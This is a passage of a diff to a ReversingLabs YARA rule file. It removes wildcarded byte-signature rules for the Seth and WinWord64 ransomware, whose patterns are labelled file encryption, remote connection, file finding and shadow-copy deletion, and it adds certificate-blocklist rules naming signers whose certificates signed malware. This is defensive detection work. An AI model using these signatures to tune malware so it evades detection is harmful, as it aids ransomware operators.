-            00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ??
-            ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ??
-            ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B
-            00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ??
-            ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ??
-            ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B
-            00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ??
-            ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ??
-            ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B
-            00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ??
-            ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 5F 5E 5B 8B
-            E5 5D C3
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yongli Li" and pe.signatures [ i ] . serial == "13:9a:7e:e1:f1:a7:73:5c:15:10:89:75:5d:f5:d3:73" and 1476057600 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_74Dbe83082E1B3Dfa29F9C24 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "dbb75cf2-1b48-52f1-8d06-e35d48c4fea4"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13222-L13238"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "1fdf6471d0b869df1a8630108cdaf1cc97d33e91d4726073913cdc54c7cf0042"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files ) and ( $delete_shadow_copies )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "EVANGEL TECHNOLOGY(HK) LIMITED" and pe.signatures [ i ] . serial == "74:db:e8:30:82:e1:b3:df:a2:9f:9c:24" and 1468817578 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win64_Ransomware_Seth : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_0A466553A6391Aafd181B400266C7B18 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Seth ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "001de900-4556-5428-a243-7ec07a7ed05e"
-		date = "2021-04-02"
-		modified = "2021-04-02"
+		id = "ef8ff250-840f-5b55-b0c7-85ca54aadc59"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win64.Ransomware.Seth.yara#L1-L122"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13240-L13256"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "72a9d902eea2381f40d42faa7f1686c4ca54d364af0cbd8711697bbc1a235646"
+		logic_hash = "cb21e5759887904d6a38cd1b363610ebc0bfd9a357050c602210468992815cbe"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Seth"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            55 53 48 81 EC ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 8D ?? ?? ?? ?? 48 8D 85 ??
-            ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? BA ?? ??
-            ?? ?? 48 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ??
-            BA ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48
-            89 C1 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C1 48 8B 95 ??
-            ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 41 89 C8 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ??
-            48 05 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 84 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8B 0D
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C1 48 8B 85 ?? ?? ?? ?? 48 89 C2 E8 ?? ?? ?? ?? 48
-            8B 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? BA
-            ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 89
-            C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 48
-            8D 15 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C1 48 8B 85
-        }
-		$encrypt_files_p2 = {
-            48 89 C2 E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 C1 8B 85
-            ?? ?? ?? ?? 89 C2 E8 ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 8B 85
-            ?? ?? ?? ?? 48 98 48 89 C1 E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 48
-            63 C8 48 8B 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 48
-            8B 95 ?? ?? ?? ?? 48 8D 45 ?? 41 B8 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 8B 85 ?? ??
-            ?? ?? 48 63 C8 48 8B 95 ?? ?? ?? ?? 48 8D 45 ?? 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 48
-            8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 83
-            BD ?? ?? ?? ?? ?? 74 ?? 48 8B 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48
-            89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ??
-            ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ??
-            48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 85 ?? ??
-            ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 D8 48 89 C1 E8 ?? ?? ?? ?? 90 48 81 C4 ?? ?? ??
-            ?? 5B 5D C3
-        }
-		$remote_connection_p1 = {
-            55 48 81 EC ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 8D ?? ?? ?? ?? 48 8B 05 ?? ??
-            ?? ?? FF D0 89 C1 E8 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8D 85 ?? ??
-            ?? ?? 41 89 D0 48 89 C2 48 8D 0D ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? FF D0 48 8B 05 ??
-            ?? ?? ?? FF D0 89 C1 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C1 BA ?? ?? ?? ?? 89 C8 F7 EA
-            C1 FA ?? 89 C8 C1 F8 ?? 29 C2 89 D0 69 C0 ?? ?? ?? ?? 29 C1 89 C8 8D 88 ?? ?? ?? ??
-            48 8D 95 ?? ?? ?? ?? 48 8D 45 ?? 41 89 C9 49 89 D0 48 8D 15 ?? ?? ?? ?? 48 89 C1 48
-            8B 05 ?? ?? ?? ?? FF D0 C7 44 24 ?? ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? 41 B8 ?? ?? ?? ??
-            BA ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? FF D0 48 89 85 ?? ?? ?? ??
-            48 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ??
-            ?? ?? C7 44 24 ?? ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 8B 95 ?? ?? ??
-            ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 48 89 85 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ??
-            0F 84 ?? ?? ?? ?? 48 8D 45 ?? 48 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7
-            44 24 ?? ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 C1 48
-            8B 05 ?? ?? ?? ?? FF D0 48 89 85 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ??
-            ?? 48 8D 85 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB
-            ?? 8B 8D ?? ?? ?? ?? 4C 8D 85 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ??
-            48 C7 44 24 ?? ?? ?? ?? ?? 4D 89 C1 41 89 C8 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 B8
-            ?? ?? ?? ?? 44 8D 40 ?? 48 8D 8D ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8B 85 ?? ?? ??
-            ?? 49 89 C9 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 85 C0 74 ?? 8B 85 ?? ?? ?? ?? 85 C0
-        }
-		$remote_connection_p2 = {
-            74 ?? B8 ?? ?? ?? ?? EB ?? B8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ??
-            ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 48 8D 55 ?? 48 8D 85 ?? ?? ?? ?? 49 89 D0 48
-            8D 15 ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 48 8D 85 ?? ?? ?? ?? 48 89 C1
-            48 8B 05 ?? ?? ?? ?? FF D0 B9 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? FF D0 48 8D 45 ?? 48
-            89 C1 E8 ?? ?? ?? ?? 84 C0 74 ?? C6 85 ?? ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C1
-            48 8B 05 ?? ?? ?? ?? FF D0 48 8B 85 ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0
-            48 8B 85 ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 B9 ?? ?? ?? ?? 48 8B 05 ??
-            ?? ?? ?? FF D0 0F B6 85 ?? ?? ?? ?? 83 F0 ?? 84 C0 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            89 C1 BA ?? ?? ?? ?? 89 C8 F7 EA C1 FA ?? 89 C8 C1 F8 ?? 29 C2 89 D0 69 C0 ?? ?? ??
-            ?? 29 C1 89 C8 8D 88 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 45 ?? 41 89 C9 49 89 D0
-            48 8D 15 ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 48 8D 45 ?? 48 C7 44 24 ??
-            ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? 49 89 C0 48 8B 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 85 C0 0F 94 C0 84 C0 74 ?? 48 8D 55 ?? 48 8D 85 ?? ?? ?? ?? 49 89 D0 48 8D 15
-            ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 48 8D 85 ?? ?? ?? ?? 48 89 C1 48 8B
-            05 ?? ?? ?? ?? FF D0 B9 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? FF D0 48 8D 45 ?? 48 89 C1
-            E8 ?? ?? ?? ?? 90 48 81 C4 ?? ?? ?? ?? 5D C3
-        }
-		$find_files = {
-            48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 83 F8 ?? 0F 95 C0 84 C0 74 ?? BB ??
-            ?? ?? ?? E9 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48 8D 95 ?? ?? ??
-            ?? 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C2 48 8B 0D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ??
-            48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ??
-            ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8
-            ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48
-            8D 95 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8B 10 48 83 EA ?? 48 8B 12
-            48 01 D0 48 89 C1 E8 ?? ?? ?? ?? 48 85 C0 0F 95 C0 84 C0 0F 85 ?? ?? ?? ?? 48 8B 8D
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? BB ?? ?? ?? ?? 48 8D 85 ?? ?? ??
-            ?? 48 89 C1 E8 ?? ?? ?? ?? 83 FB ?? 74 ?? BB ?? ?? ?? ?? EB ?? 90 BB ?? ?? ?? ?? 48
-            8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 83 FB ?? 74 ?? BB ?? ?? ?? ?? EB ?? 90 BB
-            ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 83 FB ?? 74 ?? E9 ?? ?? ?? ?? 90 E9
-            ?? ?? ?? ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48
-            89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 85 ?? ?? ??
-            ?? 48 89 C1 E8 ?? ?? ?? ?? E9
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PhaseQ Limited" and pe.signatures [ i ] . serial == "0a:46:65:53:a6:39:1a:af:d1:81:b4:00:26:6c:7b:18" and 1555545600 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_0D3Dec8794Fa7228D1Ee40Eeb8187149 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "54e9ec00-d054-521b-b60b-81efe3a8ce12"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13258-L13274"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "20084dc0b069d65755f859f5aef4be5599d1f066ba006199d3ce803b0d8f041e"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
+
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Financial Security Institute, Inc." and pe.signatures [ i ] . serial == "0d:3d:ec:87:94:fa:72:28:d1:ee:40:ee:b8:18:71:49" and 1582675200 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_24Af70B5D17A63Ad053E5821 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "034228b3-1864-5a76-ad9d-531778be10ec"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13276-L13292"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "d78f709067c83169484d9dd6e1dd8a88852362da028551d4e55e5703a22e04a7"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
+
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "24:af:70:b5:d1:7a:63:ad:05:3e:58:21" and 1474179615 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_402E9Fcba61E5Eaf9C0C7B3Bfd6259D9 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "a24e1201-4a90-5d0f-ac19-4d88a4e4cfe5"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13294-L13310"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "1bfc2610745a98ebcf0f77504815d9d1c448697fbe407d6c2e075219b401de50"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $remote_connection_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yongli Li" and pe.signatures [ i ] . serial == "40:2e:9f:cb:a6:1e:5e:af:9c:0c:7b:3b:fd:62:59:d9" and 1477440000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Winword64 : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_2C84F9136059E96134F8766670Eacd52 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects WinWord64 ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "a5f7967d-58f4-5fdd-b67f-5f5dbfec0f4b"
-		date = "2021-02-11"
-		modified = "2021-02-11"
+		id = "af7eb5ff-570f-5886-b550-3d327d05fabe"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.WinWord64.yara#L1-L215"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13312-L13328"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "73d8c4f1b3bed365320b26332f1f1b49404d8e6536f3e25042f5f64e5bc09bd4"
+		logic_hash = "d6778630dcc3e4fe2816e6dee1b823e616f53de8a924057495c7c252948a71b4"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "WinWord64"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$remote_connection_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? A1 ?? ?? ??
-            ?? 33 DB 83 3D ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 0F 43 0D ?? ?? ?? ??
-            03 C1 89 9D ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 0F 43 0D ?? ?? ?? ?? 51
-            50 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 53 89 5D ?? 8D 85 ?? ?? ?? ?? 83 BD ?? ??
-            ?? ?? ?? 53 0F 43 85 ?? ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 8B D8 89 9D ?? ?? ?? ??
-            85 DB 0F 84 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? A1 ?? ?? ?? ?? 0F 43 0D
-            ?? ?? ?? ?? 03 C1 83 3D ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 0F 43 0D ?? ?? ?? ?? 51 50 51
-            8D 4D ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 6A ?? 0F 43 45 ?? 68 ?? ?? ?? ?? 50 53
-            FF 15 ?? ?? ?? ?? 8B 55 ?? 8B D8 89 9D ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55
-            ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ??
-            76 ?? FF 15 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? C7
-            45 ?? ?? ?? ?? ?? 66 89 45 ?? 85 DB 0F 84 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? B9 ?? ??
-            ?? ?? A1 ?? ?? ?? ?? 0F 43 0D ?? ?? ?? ?? 03 C1 83 3D ?? ?? ?? ?? ?? B9
-        }
-		$remote_connection_p2 = {
-            0F 43 0D ?? ?? ?? ?? 51 50 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D BD ??
-            ?? ?? ?? 83 BD ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? A1 ?? ?? ?? ?? 0F 43 BD ?? ?? ?? ?? 83
-            3D ?? ?? ?? ?? ?? 0F 43 0D ?? ?? ?? ?? 03 C1 83 3D ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 0F
-            43 0D ?? ?? ?? ?? 51 50 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 85 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 50 57 53 FF 15 ?? ?? ??
-            ?? 8B 55 ?? 89 85 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ??
-            8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51
-            E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 88 45 ?? 8B 95 ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ??
-            ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 76 ??
-            FF 15 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ??
-            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ??
-            ?? ?? C6 45 ?? ?? 8D 4D ?? 83 7D ?? ?? 8B 45 ?? 0F 43 4D ?? 03 C1 83 7D ?? ?? 8D 4D
-            ?? 0F 43 4D ?? 51 50 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ??
-            ?? 83 BD ?? ?? ?? ?? ?? 8D 4D ?? 68 ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 89 85 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? B9 ?? ??
-            ?? ?? 83 3D ?? ?? ?? ?? ?? 8B 75 ?? 8B C6 0F 43 0D ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8B
-        }
-		$remote_connection_p3 = {
-            55 ?? 2B C2 57 51 3B F8 77 ?? 8D 04 3A 83 FE ?? 89 45 ?? 8D 45 ?? 0F 43 45 ?? 8D 34
-            10 56 E8 ?? ?? ?? ?? 83 C4 ?? C6 04 37 ?? EB ?? C6 85 ?? ?? ?? ?? ?? 8D 4D ?? FF B5
-            ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 75 ?? 8B C6
-            8B BD ?? ?? ?? ?? 0F 43 CF 8B 55 ?? 2B C2 8B 9D ?? ?? ?? ?? 53 51 3B D8 77 ?? 8D 04
-            1A 83 FE ?? 89 45 ?? 8D 45 ?? 0F 43 45 ?? 8D 34 10 56 E8 ?? ?? ?? ?? 83 C4 ?? C6 04
-            1E ?? EB ?? C6 85 ?? ?? ?? ?? ?? 8D 4D ?? FF B5 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 8B BD
-            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? B9 ?? ?? ?? ?? 83 3D ?? ??
